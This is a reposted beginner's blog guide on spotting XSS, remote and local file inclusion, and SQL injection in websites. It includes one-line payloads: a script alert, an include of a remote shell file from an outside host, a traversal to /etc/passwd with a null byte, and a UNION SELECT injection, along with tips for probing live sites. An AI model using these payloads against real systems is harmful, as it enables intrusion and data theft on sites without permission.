Web Apps Vulnerabilities Break Down
Taken from DarkMindZ. Such a good intro.
[ How to find vulnerabilities in websites | The Newbie Guide ]
[+] XSS :
|
|- Definition: Cross Site Scripting.
|
|- Technical Definition: Injecting HTML in a page. Permanent or not.
|
|- Example:
<script>alert(”XSS”)</script>
|
|- Where is it found:
|
| [ Search Engines ] || [ GET Variables ] || [ Different Forms ]
|
|- Spotting it:
|
| [ Search Engines ]
|
| If the search you input, is outputted on the page. the chances are
| it is vulnerable.
|
| [ GET Variables ]
|
| If the GET var is outputted on the page, it is most likely
| the site is vulnerable, Checking for hidden tags also is helpfull,
| sometimes the GET var is stored in a hidden tag to be used later.
|
| [ Different Forms ]
|
| Login forms, any input form you can find in a site, could be
| vulnerable, checking it, by checking if the input is outputted.
|
|__________________________________________________________________
|
|
|
[+] RFI / LFI :
|
| - Definition: Remote File Inclusion | Local File Inclusion.
|
| - Technical Definition:
| [ RFI ] Execution of a remote script on a target server,
| by including it.
| [ LFI ] Execution, or disclosure of files, that are on the same
| target server.
|
| - Example:
|
|
?page=http:/www.darkmindz.com/shell/x2300.txt?
|
?page=../../../../etc/passwd
|
| - Where is it found:
| [ GET Variables ]
|
| - Spotting it:
|
| [ GET Variables ]
|
| It is mostly common sense, if you see the main page redirecting to other pages, by a GET var, it is most likely vulnerable.
| sometimes, it might be hiding behind an integer, you can spot it by, changing that get var to anything else, and if you see any main(); errors,
| it is vulerable.
| a common way to bypass some extension restrctions, is to nullbyte the extension, by:
?page=../../../../etc/passwd%00
|
|______________________________________________________________________
|
|
|
[+] SQL Injection :
|
| - Definition: [ the name says it all ]
|
| - Techical definition : Injecting a SQL, to echo out data from other tables / rows. etc.
|
| - Example:
|
|
?id=– UNION SELECT ALL FROM USERS /*
|
| - Where is it found:
|
| [ GET Variables ] || [ Login Forms ] || [ Search Engine ] || [ Different Forms ]
|
| - Spotting it:
|
| [ GET variables ]
|
| Most of the times, it is an integer that we are looking for in a GET var, for example : ‘ ?id=123 ‘ ‘ ?cat=22 ‘ .. etc.
| if we change that integer to a quote or anything else, we could get a MySQL error, then we know that this site might be vulnerable.
|
| [ Login Forms ]
|
| We can try to inject a normal SQL injection in a login form, because most login forms pass thru a SQL query to check for data.
|
| [ Search Engine ]
|
| Same applies here, most search engines looks for the info in a SQL DB. we can always inject that.
|
| [ Different Forms ]
|
| The general rule applies, you can try a random SQL injection, with different quote style to see if it would show any errors or not.
|
|______________________________________________________________________
May 13th, 2008 at 1:38 pm
[...] original here: Web Apps Vulnerabilities Break Down sql server securitysql server securityRelated Posts Spotting Vulnerable [...]